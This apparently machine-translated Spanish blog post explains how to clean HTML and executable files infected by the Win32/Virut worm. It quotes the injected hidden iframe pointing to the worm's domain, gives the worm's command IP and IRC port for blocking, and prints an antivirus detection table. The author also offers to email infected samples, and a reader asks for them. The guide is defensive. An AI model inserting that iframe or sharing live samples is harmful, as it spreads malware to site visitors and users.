He encontrado este frustrante que la mayoría de Anti-virus se suprime el producto o su cuarentena los archivos infectados. He perdido muchos proyectos porque de esta gusanos. No utilizados "auto-clean/fix" escáner en línea si usted favorece sus proyectos. Citados aquí es paso a medidas para win32/Virut fija. Si no te gusta la edición manual que usted necesitará un buscar y reemplazar herramientas para eliminar el código de inserción dentro de los archivos infectados.
- Asegúrese de que todos los infectados (*. exe win32/virtob) ha sido los archivos de cuarentena.
- Opcionalmente bloquear el acceso de salida a 78.109.19.139:80 irc y el puerto 65520 en la configuración de tu cortafuegos.
- AntiVirus personas de movilidad reducida si los hubiere.
- Apagar el PC e inicie Windows en SafeMode (Presione F8 o F5 después de la pantalla del BIOS).
- Buscar todos los archivos con *. htm, *. html, *. php, asp *. extensiones.
eliminar o sustituir el siguiente texto (cadenas)<iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"> </ iframe>
Buscar y reemplazar herramientas
- Por las ventanas - hay un montón de herramientas similares y no estoy seguro de qué recomendar una que parece más hizo lo mismo por lo que Google para "buscar y reemplazar" su mejor selección.
- Para Cygwin o * nix consola bash - Utilizado sed comandos para buscar y reemplazar cadenas en todos los archivos infectados.
- Python en Windows - Puede probar estas soluciones.
Win32/Virut Virustotal.com resultados
Antivirus Versión Última actualización Resultados AhnLab-V3 2007.11.12.0 2007.11.12 -- AntiVir 7.6.0.34 2007.11.12 W32/Virut.AF Authentium 4.93.8 2007.11.10 -- Avast 4.7.1074.0 2007.11.11 Win32: Virtob PROMEDIO 7.5.0.503 2007.11.11 Win32/Virut BitDefender 7,2 2007.11.12 Win32.Virtob.6.Gen CAT-QuickHeal 9,00 2007.11.12 W32.Virut.K ClamAV 0.91.2 2007.11.12 W32.Virut-5 DrWeb 4.44.0.09170 2007.11.12 Win32.Virut.19 eSafe 7.0.15.0 2007.11.08 -- eTrust-Vet 31.2.5289 2007.11.12 Win32/Virut.6375 Ewido 4,0 2007.11.12 -- FileAdvisor 1 2007.11.12 -- Fortinet 3.11.0.0 2007.10.19 W32/Virut.AE F-Prot 4.4.2.54 2007.11.10 W32/Injector.A.gen! Eldorado F-Secure 6.70.13030.0 2007.11.12 Virus.Win32.Virut.ab Ikarus T3.1.1.12 2007.11.12 Win32.Virtob.AS Kaspersky 7.0.0.125 2007.11.12 Virus.Win32.Virut.ab McAfee 5160 2007.11.09 W32/Virut.g Microsoft 1,3007 2007.11.12 Virus: Win32/Virut.Q NOD32v2 2653 2007.11.12 -- Norman 5.80.02 2007.11.09 W32/Virut.W Panda 9.0.0.4 2007.11.11 W32/Virutas.W Prevx1 V2 2007.11.12 -- El aumento de 20.18.02.00 2007.11.12 Win32.Virut.z Sophos 4.23.0 2007.11.12 W32/Vetor-G Sunbelt 2.2.907.0 2007.11.09 VIPRE.Suspicious Symantec 10 2007.11.12 W32.Virut.W TheHacker 6.2.9.124 2007.11.12 W32/Virut.gen VBA32 3.12.2.4 2007.11.11 -- VirusBuster 4.3.26:9 2007.11.11 Win32.Virut.Gen.4 Webwasher-Gateway 6.0.1 2007.11.12 Win32.Virut.AF Notas sobre Microsoft Windows Malicious Software Removal herramienta
Puesta al día sobre: Nov, 20 2007 por NoahArk
Tengo Win.32/virut archivos en mi archivo (para fines de copia de seguridad). La semana pasada he instalado Microsoft Windows Malicious Software Removal herramienta v1.35 (13-nov-2007, KB890830).
De Microsoft afirmó esta herramienta puede w32/Virut fija. Sin embargo, los resultados worsed es mucho más de lo que esperaba. No se detectan en Win32/Virut mi el SP2 de Windows XP en lugar a mitad de camino antes de la exploración completa de su activación y el gusano comienza a difundir como Win32/virtob y Virut [AW] (*. exe que infectan y *. html). Me eliminó todas las herramientas de eliminación de Microsoft (MS herramienta Malicious Software Removal, Defender MS, MS Baseline Security Analyzer). Microsoft Developer deben tener mejor saber sobre cómo prevenir la mayoría de este tipo infections.Its sus propias fallas de diseño y productos. Todavía conservo la Win32/Virut archivos infectados, si alguien lo necesita, por favor envíe un correo electrónico a
. Mi petición al equipo de Microsoft, que debería limpiar este crapy gusanos para que todos los desafortunados del cliente (incluida yo) tienen costumbre de cazar en soluciones antivirus caros. W32/Virut y ntkrnlpa.info
La propagación de gusanos se inició desde septiembre de 2006. Después de un año anniversay Todavía en la naturaleza como nunca se detendrá.
Me gustaría enviar una carta a ntkrnlpa.info ISP (hosting.ua), y se han cerrado los sitios para siempre. Y Google también está bloqueando el sitio también se le dará un aviso de alerta en caso de búsqueda de la URL.
Este gusano se propagan a través de etiquetas HTML simple y aumentó el tamaño de archivo en torno a 8kb. Debido a este método sencillo y de bajo más daño Anti-virus y seguridad proveedor de etiqueta como de media y baja. El hilo etiqueta es discutible.
Sobre la base de wikipedia "cuota de uso del navegador web de Estadística", el 81% de los usuarios de Internet está utilizando Microsoft Internet Explorer (50% de los visitantes de este weblog es también en IE), IE navegador no bloqueado IFRAME que puede ser un problema.
Imagínese si algunos webmaster subido un archivos infectados de sitios web de gran volumen de tráfico como MySpace y Facebook. Los resultados podrían ser un desastre. Nadie quiere ver su ocurriendo.
Relacionado Entradas
- 12 de noviembre de 2007 a las 12:35 pm
- 8 de febrero de 2008 a 10:58 am
- 0,3
- URL
2 Responses to "Soluciones para los archivos infectados con variantes y Win32/virut.Virtob"
Trackback URL: Utilice el TrackBack URL ↑ hacer ping a este artículo. Si tu blog no soporta Trackbacks puede que desee dejar un comentario lugar.
"escribir como si estuviera hablando con un buen amigo (en frente de su madre)."
. Usted tiene la palabra
Descargo de responsabilidad: Para cualquier contenido que usted post, usted otorga a Kakkoi la libre de regalías, irrevocable, perpetuo, exclusivo y totalmente sublicensable licencia para utilizar, reproducir, modificar, adaptar, publicar, traducir, crear trabajos derivados, distribuir, ejecutar y mostrar dicho contenido en su totalidad o en parte, en todo el mundo e incorporarlo en otros trabajos, en cualquier forma, los medios de comunicación o tecnología conocida ahora o desarrollada más adelante. Algunos derechos reservados.
El problema en la prevención de virus como el Virut tipos es que el cambio "bothosts", así como el como el cifrado con cada nueva variante que sale. Una posible buena solución para evitar que su máquina de hacer no autorizados no deseados se conecta por un desconocido proceso o programa es que por ejemplo, un ZoneAlarm firewall instalado (lo que permite precisamente el bloqueo de STMP por ejemplo, para determinados programas - el valor por defecto es' bloqueado '-, se especifica el bloqueo de puertos (por ejemplo, IRC), la prevención y negar cualquier tráfico entrante no solicitado, así como la adaptación Ident puerto escondido, (significa que este es un verdadero sigilo firewall). especificado de seguridad y comportamiento en relación con Internet, intranet, local, zonas seguras, así como una 5-paso perfil de seguridad a establecer para determinados programas).
Además, el usuario es informado acerca de cada acción y la red de intentos de acceso - ingoing y saliente - con la fuente,
objetivo, el puerto y el programa o el nombre de proceso que inicia la conexión. Prevención de spam-bot comportamiento de los medios: sólo permiten 'su' conocidos programas de correo para enviar mails. NUNCA almacenar cualquier contraseñas en la máquina o en el programa de correo! Set 'SMTP acción' a 'requiere la contraseña de "incluso si su proveedor de SMTP no es necesario (en caso afirmativo, esto significa anónimo SMTP está permitido, entonces
BAD tienen un ISP que es realmente invitando a los spambots a su notoria difundir basura en todo el mundo!).
Esenciales de seguridad-las normas siguen siendo ignorados por el ISP en estos casos. En la misma forma, los clientes de estos ISP son las víctimas de estos. Ir en busca de otro ISP, si es posible. Todos los otros programas debe ser bloqueada para SMTP (e IRC), así como protocolos. Eso es esencial en estos días para mantener una máquina infectada tranquila hacia la Internet, incluso si finalmente es infectado por algún extraño gusano, o botclient software. (Luego, el PC se denomina "drogado" o la forma en que se dice también por la seguridad de personas, lo que se denomina 'Zombie'). Nunca permita que HTTP o cualquier otra saliente peticiones para otros programas, aparte de su conocido navegador, los medios de comunicación-o los jugadores
transferencia de archivos, correo y programas de chat. Tenga en cuenta que sobre todo 'Adware', 'Nag-Ware "y" Spy-ware' cargado de los programas siempre están tratando de "llamar a casa!
Igual que los virus que los intentos de alcanzar o, al menos, escucha a su "maestro hosts', (por supuesto, para permitir que tales instalaciones de la seguridad en su sistema de actualización por su código de hosts conocidos). Uso de una lista de hosts que redirecciones los servidores que figuran en él a ninguna parte (se entiende el localhost) también es una buena pista. Este archivo también está protegido de ser manipulado (no autorizada supresiones o adiciones de cualquier software o sitio web scripts) por software de terceros (es decir, ZoneAlarm, McAffee, NOD32).
Hola
puede u me envía un correo electrónico a estos archivos solo quiero utilizarlos para fines de aprendizaje
GRACIAS BUDDY